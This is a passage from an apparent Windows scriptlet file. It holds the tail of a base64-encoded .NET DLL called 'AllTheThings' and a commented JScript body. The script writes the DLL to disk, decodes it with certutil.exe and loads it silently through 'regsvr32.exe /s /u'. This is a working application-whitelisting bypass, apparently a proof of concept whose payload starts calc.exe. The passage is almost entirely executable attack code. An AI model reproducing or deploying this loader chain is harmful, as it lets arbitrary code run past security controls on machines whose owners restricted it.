YWxsZXIAU3lzdGVtLkNvbXBvbmVudE1vZGVsAFJ1bkluc3RhbGxlckF0dHJpYnV0\
ZQBTeXN0ZW0uQ29sbGVjdGlvbnMASURpY3Rpb25hcnkAU2VydmljZWRDb21wb25l\
bnQAQ2xhc3NJbnRlcmZhY2VBdHRyaWJ1dGUAQ2xhc3NJbnRlcmZhY2VUeXBlAFBy\
b2dJZEF0dHJpYnV0ZQBUcmFuc2FjdGlvbkF0dHJpYnV0ZQBUcmFuc2FjdGlvbk9w\
dGlvbgBDb21SZWdpc3RlckZ1bmN0aW9uQXR0cmlidXRlAENvbVVucmVnaXN0ZXJG\
dW5jdGlvbkF0dHJpYnV0ZQBDYWxsQ29udlN0ZGNhbGwAQWxsVGhlVGhpbmdzLmRs\
bABtc2NvcmxpYgBQcm9ncmFtAFRoaW5nMABUaGluZzEAQnlwYXNzAEV4cG9ydHMA\
TWFpbgBFeGVjAFVuaW5zdGFsbABzYXZlZFN0YXRlAFJlZ2lzdGVyQ2xhc3MAa2V5\
AFVuUmVnaXN0ZXJDbGFzcwBFbnRyeVBvaW50AGh3bmQAaGluc3QAbHBzekNtZExp\
bmUAbkNtZFNob3cARGxsUmVnaXN0ZXJTZXJ2ZXIARGxsVW5yZWdpc3RlclNlcnZl\
cgBBbGxUaGVUaGluZ3MAAABLSABlAGwAbABvACAARgByAG8AbQAgAE0AYQBpAG4A\
LgAuAC4ASQAgAEQAbwBuACcAdAAgAEQAbwAgAEEAbgB5AHQAaABpAG4AZwABEWMA\
YQBsAGMALgBlAHgAZQAANUgAZQBsAGwAbwAgAFQAaABlAHIAZQAgAEYAcgBvAG0A\
IABVAG4AaQBuAHMAdABhAGwAbAAAL0kAIABhAG0AIABhACAAYgBhAHMAaQBjACAA\
QwBPAE0AIABPAGIAagBlAGMAdAAANUkAIABzAGgAbwB1AGwAZABuACcAdAAgAHIA\
ZQBhAGwAbAB5ACAAZQB4AGUAYwB1AHQAZQABRUkAIABzAGgAbwB1AGwAZABuACcA\
dAAgAHIAZQBhAGwAbAB5ACAAZQB4AGUAYwB1AHQAZQAgAGUAaQB0AGgAZQByAC4A\
AQAAAB4zgqE0xlNCjdJI5PE1tnEABCABAQgDIAABBSABARERBCABAQIEIAEBDgQA\
AQEOBgABElESTQUgAQERaQUgAQERdQi3elxWGTTgiQiwP19/EdUKOgUBAAEAACkB\
ACQzMUQyQjk2OS03NjA4LTQyNkUtOUQ4RS1BMDlGQzlBNTE2ODAAAAgBAAAAAAAA\
ABQBAA9kbGxndWVzdC5CeXBhc3MAAAgBAAMAAAAAAAMAAAEFIAEBEl0EAQAAAAoA\
BCCAgQEYGA4IBgAAIICBAYCgACQAAASAAACUAAAABgIAAAAkAABSU0ExAAQAAAEA\
AQALQR1gd6ckoaTJoYdu3Tbzd/Munbs0UEf05nIsjyf4fvPHfASpD2Yi9OUqhVDo\
nptUQNXJSz30AxhpDekVvQPzsd2UXd1quH28rmhCh9MI9Y70ejbk1Uq1VnazOj1Q\
1KZPYpfikbWNmiP8LITaM2XQ5TDjYFUoJ/4LxDQ/ZqzYswgBAAgAAAAAAB4BAAEA\
VAIWV3JhcE5vbkV4Y2VwdGlvblRocm93cwEIAQABAAAAAAAFAQAAAAARAQAMQWxs\
VGhlVGhpbmdzAAAXAQASQ29weXJpZ2h0IMKpICAyMDE2AAApAQAkMDU0N2ZmNDAt\
NTI1NS00MmEyLWJlYjctMmZmMGRiZjdkM2JhAAAMAQAHMS4wLjAuMAAATQEAHC5O\
RVRGcmFtZXdvcmssVmVyc2lvbj12NC41LjIBAFQOFEZyYW1ld29ya0Rpc3BsYXlO\
YW1lFC5ORVQgRnJhbWV3b3JrIDQuNS4yAABIoQBAAIABAAAA/+BIoQhAAIABAAAA\
/+BIoRBAAIABAAAA/+AAAABAAAADAAYAcC4AAAAAAAAAAAAAji4AAAAgAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAIAuAAAAAAAAAAAAAAAAAAAAAF9Db3JEbGxNYWluAG1z\
Y29yZWUuZGxsAAAAAABIoQAgAIABAAAA/+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALAAAGAAAAAAwAAAYAAAAA\
DQAABgAAAAAAAAAAvH9+VwAAAACPQAAAAAAAAAMAAAADAAAAQEAAAExAAABYQAAA\
Gi4AACYuAAAyLgAAXkAAAHBAAACEQAAAAQACAAAARGxsUmVnaXN0ZXJTZXJ2ZXIA\
RGxsVW5yZWdpc3RlclNlcnZlcgBFbnRyeVBvaW50AFxBbGxUaGVUaGluZ3MuZGxs\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAQAAAAGAAAgAAAAAAAAAAA\
AAAAAAAAAQABAAAAMAAAgAAAAAAAAAAAAAAAAAAAAQAAAAAASAAAAFhgAAA8AwAA\
AAAAAAAAAAA8AzQAAABWAFMAXwBWAEUAUgBTAEkATwBOAF8ASQBOAEYATwAAAAAA\
vQTv/gAAAQAAAAEAAAAAAAAAAQAAAAAAPwAAAAAAAAAEAAAAAgAAAAAAAAAAAAAA\
AAAAAEQAAAABAFYAYQByAEYAaQBsAGUASQBuAGYAbwAAAAAAJAAEAAAAVAByAGEA\
bgBzAGwAYQB0AGkAbwBuAAAAAAAAALAEnAIAAAEAUwB0AHIAaQBuAGcARgBpAGwA\
ZQBJAG4AZgBvAAAAeAIAAAEAMAAwADAAMAAwADQAYgAwAAAAGgABAAEAQwBvAG0A\
bQBlAG4AdABzAAAAAAAAACIAAQABAEMAbwBtAHAAYQBuAHkATgBhAG0AZQAAAAAA\
AAAAAEIADQABAEYAaQBsAGUARABlAHMAYwByAGkAcAB0AGkAbwBuAAAAAABBAGwA\
bABUAGgAZQBUAGgAaQBuAGcAcwAAAAAAMAAIAAEARgBpAGwAZQBWAGUAcgBzAGkA\
bwBuAAAAAAAxAC4AMAAuADAALgAwAAAAQgARAAEASQBuAHQAZQByAG4AYQBsAE4A\
YQBtAGUAAABBAGwAbABUAGgAZQBUAGgAaQBuAGcAcwAuAGQAbABsAAAAAABIABIA\
AQBMAGUAZwBhAGwAQwBvAHAAeQByAGkAZwBoAHQAAABDAG8AcAB5AHIAaQBnAGgA\
dAAgAKkAIAAgADIAMAAxADYAAAAqAAEAAQBMAGUAZwBhAGwAVAByAGEAZABlAG0A\
YQByAGsAcwAAAAAAAAAAAEoAEQABAE8AcgBpAGcAaQBuAGEAbABGAGkAbABlAG4A\
YQBtAGUAAABBAGwAbABUAGgAZQBUAGgAaQBuAGcAcwAuAGQAbABsAAAAAAA6AA0A\
AQBQAHIAbwBkAHUAYwB0AE4AYQBtAGUAAAAAAEEAbABsAFQAaABlAFQAaABpAG4A\
ZwBzAAAAAAA0AAgAAQBQAHIAbwBkAHUAYwB0AFYAZQByAHMAaQBvAG4AAAAxAC4A\
MAAuADAALgAwAAAAOAAIAAEAQQBzAHMAZQBtAGIAbAB5ACAAVgBlAHIAcwBpAG8A\
bgAAADEALgAwAC4AMAAuADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAAEAAAAByuKK40rqCu\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAA==\
-----END CERTIFICATE-----"
// Main body of the scriptlet: choose one of the two embedded, certutil-encoded
// DLLs by process architecture, write it to disk, decode it, and load it.
//
// Observable artefacts, all visible in the statements below:
//   - files created under relative names (current directory of the host process):
//       AllTheThingsx64.txt + x64.dll, or AllTheThingsx86.txt + x86.dll
//   - child processes started through WScript.Shell.Run:
//       certutil.exe /decode <txt> <dll>
//       regsvr32.exe /s /u <dll>
//   - nothing here deletes the .txt or .dll afterwards, so both remain on disk.
//
// PROCESSOR_ARCHITECTURE is read from the "Process" environment block, i.e. it
// describes the process hosting this script rather than the installed OS.
var WshShell = new ActiveXObject("WScript.Shell");
var WshProcEnv = WshShell.Environment("Process");
var process_arch = WshProcEnv("PROCESSOR_ARCHITECTURE");
if(process_arch == "AMD64")
{
// Drop the encoded 64-bit blob as text, then have certutil decode it to x64.dll.
SaveStringToFile("AllTheThingsx64.txt", x64dllEncoded);
// Run() is called without the wait flag, so it returns without waiting for
// certutil to finish; `r` is never read afterwards.
var r = new ActiveXObject("WScript.Shell").Run("certutil.exe /decode AllTheThingsx64.txt x64.dll");
// Fixed 5 s busy-wait standing in for "decode has finished" - there is no
// check that x64.dll actually exists before the next step.
sleep(5000);
// Silent (/s) unregister (/u) call on the decoded DLL; the result is not inspected.
var execFilex64 = new ActiveXObject("WScript.Shell").Run("regsvr32.exe /s /u x64.dll");
}
else
{
// Any value other than "AMD64" takes the 32-bit path, with the same three steps.
SaveStringToFile("AllTheThingsx86.txt", x86dllEncoded);
var r = new ActiveXObject("WScript.Shell").Run("certutil.exe /decode AllTheThingsx86.txt x86.dll");
sleep(5000);
var execFilex86 = new ActiveXObject("WScript.Shell").Run("regsvr32.exe /s /u x86.dll");
}
]]>
</script>
</registration>
</scriptlet>